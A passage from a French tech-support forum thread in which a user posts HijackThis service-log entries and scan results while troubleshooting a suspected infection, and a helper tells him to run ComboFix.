O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Boonty Games - BOONTY - C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe
O23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\system32\drivers\CDAC11BA.EXE
O23 - Service: Serveur de licence CA (CA_LIC_SRVR) - Computer Associates - C:\Program Files\CA\SharedComponents\CA_LIC\lic98rmtd.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\ccSetMgr.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: eID CRL Service - Zetes - C:\WINDOWS\system32\beidservicecrl.exe
O23 - Service: eID Privacy Service - Zetes - C:\WINDOWS\system32\beidservicepcsc.exe
O23 - Service: FreezeScreenSaver - Unknown owner - C:\WINDOWS\system32\FreezeScreenSaver.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: PIXMA Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service: Service de l’iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Sunbelt Kerio Personal Firewall 4 (KPF4) - Sunbelt Software - C:\Program Files\Sunbelt Software\Personal Firewall 4\kpf4ss.exe
O23 - Service: Event Log Watch (LogWatch) - Computer Associates - C:\Program Files\CA\SharedComponents\CA_LIC\LogWatNT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: SupportSoft Sprocket Service (belgacom) (sprtsvc_belgacom) - SupportSoft, Inc. - C:\Program Files\Belgacom\bin\sprtsvc.exe
O23 - Service: SupportSoft RemoteAssist - SupportSoft, Inc. - C:\Program Files\Fichiers communs\Supportsoft\bin\ssrc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: X10 Device Network Service (x10nets) - X10 - C:\PROGRA~1\COMMON~1\X10\Common\x10nets.exe
wauthimi
Messages postés
8
Date d'inscription
dimanche 27 septembre 2009
Statut
Membre
Dernière intervention
5 octobre 2009
28 sept. 2009 à 22:29
28 sept. 2009 à 22:29
Bonsoir
Suite et malheureusement pas fin
rapport genproc
GenProc n'a détecté aucune infection caractéristique et suggère de suivre la procédure suivante :
j'ai exécuté tooolscleaner2
essetonline scanner ne trouve rien
J'ai toujours le même phénomène
Que puis-je faire?
Michel
Suite et malheureusement pas fin
rapport genproc
GenProc n'a détecté aucune infection caractéristique et suggère de suivre la procédure suivante :
j'ai exécuté tooolscleaner2
essetonline scanner ne trouve rien
J'ai toujours le même phénomène
Que puis-je faire?
Michel
Narco!4
Messages postés
2385
Date d'inscription
dimanche 25 janvier 2009
Statut
Contributeur
Dernière intervention
25 octobre 2012
467
29 sept. 2009 à 21:55
29 sept. 2009 à 21:55
[*] Télécharge combofix (sUBs) http://download.bleepingcomputer.com/sUBs/ComboFix.exe sur ton Bureau
[*] Double clique combofix.exe et suis les instructions.
[*] Installe la console de récupération si proposé et continue.
[*] Lorsque le scan sera complété, un rapport apparaîtra. Copie/colle ce rapport dans ta prochaine réponse.
NOTE : Le rapport se trouve également ici : C:\Combofix.txt
[*] Double clique combofix.exe et suis les instructions.
[*] Installe la console de récupération si proposé et continue.
[*] Lorsque le scan sera complété, un rapport apparaîtra. Copie/colle ce rapport dans ta prochaine réponse.
NOTE : Le rapport se trouve également ici : C:\Combofix.txt
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
wauthimi
Messages postés
8
Date d'inscription
dimanche 27 septembre 2009
Statut
Membre
Dernière intervention
5 octobre 2009
3 oct. 2009 à 22:04
3 oct. 2009 à 22:04
Bonsoir,
Je ne suis pas parvenu à exécuter combofix.
Il reste inactif sauf en mode sans echec sans internet et là il s'arrête parce qu'il me manque la console de réparation. Je n'ai pas de cd XP juste un cd permettant de faire un restore avec une version datant de 2004.
Entretemps, le problème semble avoir disparu.
Un conseil est toujours le bienvenu
bàv
Michel
Je ne suis pas parvenu à exécuter combofix.
Il reste inactif sauf en mode sans echec sans internet et là il s'arrête parce qu'il me manque la console de réparation. Je n'ai pas de cd XP juste un cd permettant de faire un restore avec une version datant de 2004.
Entretemps, le problème semble avoir disparu.
Un conseil est toujours le bienvenu
bàv
Michel
27 sept. 2009 à 13:52
j'ai tenté d'exécuter genproc mais après une heure j'ai toujours l'écran suivant et presque pas d'activité via le gestionnaire de tâche. J'ai mis fin au process.
Que dois-je faire?
________________________________________________________________________________
GenProc *** narco4 ~ jean chretien1 ~ Batch_Man *** [2.631]
º ³ Veuillez patienter pendant que GenProc teste diverses infections³ º
º ³ Ceci peut durer de 1 a 5 minutes environ ³ º
bàv
Michel